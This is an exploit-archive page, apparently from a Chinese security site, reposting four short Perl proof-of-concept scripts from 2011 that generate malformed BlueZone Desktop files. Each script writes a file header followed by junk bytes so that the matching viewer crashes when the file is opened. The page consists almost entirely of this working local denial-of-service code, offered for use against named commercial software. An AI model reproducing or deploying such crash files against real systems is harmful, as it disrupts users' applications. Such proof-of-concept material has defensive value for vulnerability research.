首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BlueZone Desktop Multiple Malformed files Local Denial of Service Vulnerabilitie
来源:vfocus.net 作者:Silent 发布时间:2011-10-26  

# Exploit Title: BlueZone Desktop Malformed .zmd file Local Denial of Service
# Date: 10-24-11
# Author: Silent Dream
# Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial
# Version: Latest
# Tested on: Windows XP SP3
 #To trigger: Run this script, double click file to open with bzmd.exe, program dies.
 
my $file = "bluez.zmd";
my $head = "BZMD215AK";
my $junk = "A" x 20;
 
open($File, ">$file");
print $File $head.$junk;
close($FILE);

exit();
# Exploit Title: BlueZone Desktop Malformed .zmp file Local Denial of Service
# Date: 10-24-11
# Author: Silent Dream
# Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial
# Version: Latest
# Tested on: Windows XP SP3
#To trigger: Run this script, double click file to open with bzmp.exe, program dies.
 
my $file = "bluez.zmp";
my $head = "BZMP215AK";
my $junk = "A" x 20;
 
open($File, ">$file");
print $File $head.$junk;
close($FILE);

exit();
# Exploit Title: BlueZone Desktop Malformed .zvt file Local Denial of Service
# Date: 10-24-11
# Author: Silent Dream
# Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial
# Version: Latest
# Tested on: Windows XP SP3
#To trigger: Run this script, double click file to open with bzvt.exe, program dies.
 
my $file = "bluez.zvt";
my $head = "BZVT100AK";
my $junk = "A" x 20;
 
open($File, ">$file");
print $File $head.$junk;
close($FILE);

exit();
# Exploit Title: BlueZone Desktop Malformed .zad file Local Denial of Service
# Date: 10-24-11
# Author: Silent Dream
# Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial
# Version: Latest
# Tested on: Windows XP SP3
#To trigger: Run this script, double click file to open with bzad.exe, program dies.
 
my $file = "bluez.zad";
my $head = "BZAD200BK";
my $junk = "A" x 20;
 
open($File, ">$file");
print $File $head.$junk;
close($FILE);


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·phpLDAPadmin <= 1.2.1.1 (query
·Advanced MP3 Manager 1.x Local
·SAP Management Console OSExecu
·Nextwebstudio Denial of Servic
·73 bytes sys_execve("/usr/bin/
·FTP Voyager Remote Crash Explo
·Reggae player (.ogg) Local BOF
·phpLDAPadmin 0.9.4b DoS
·phpScheduleIt PHP reserve.php
·Apache Server 2.3.14 <= Denia
·GTA SA-MP server.cfg Buffer Ov
·Halloween 4 local root Exploit
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved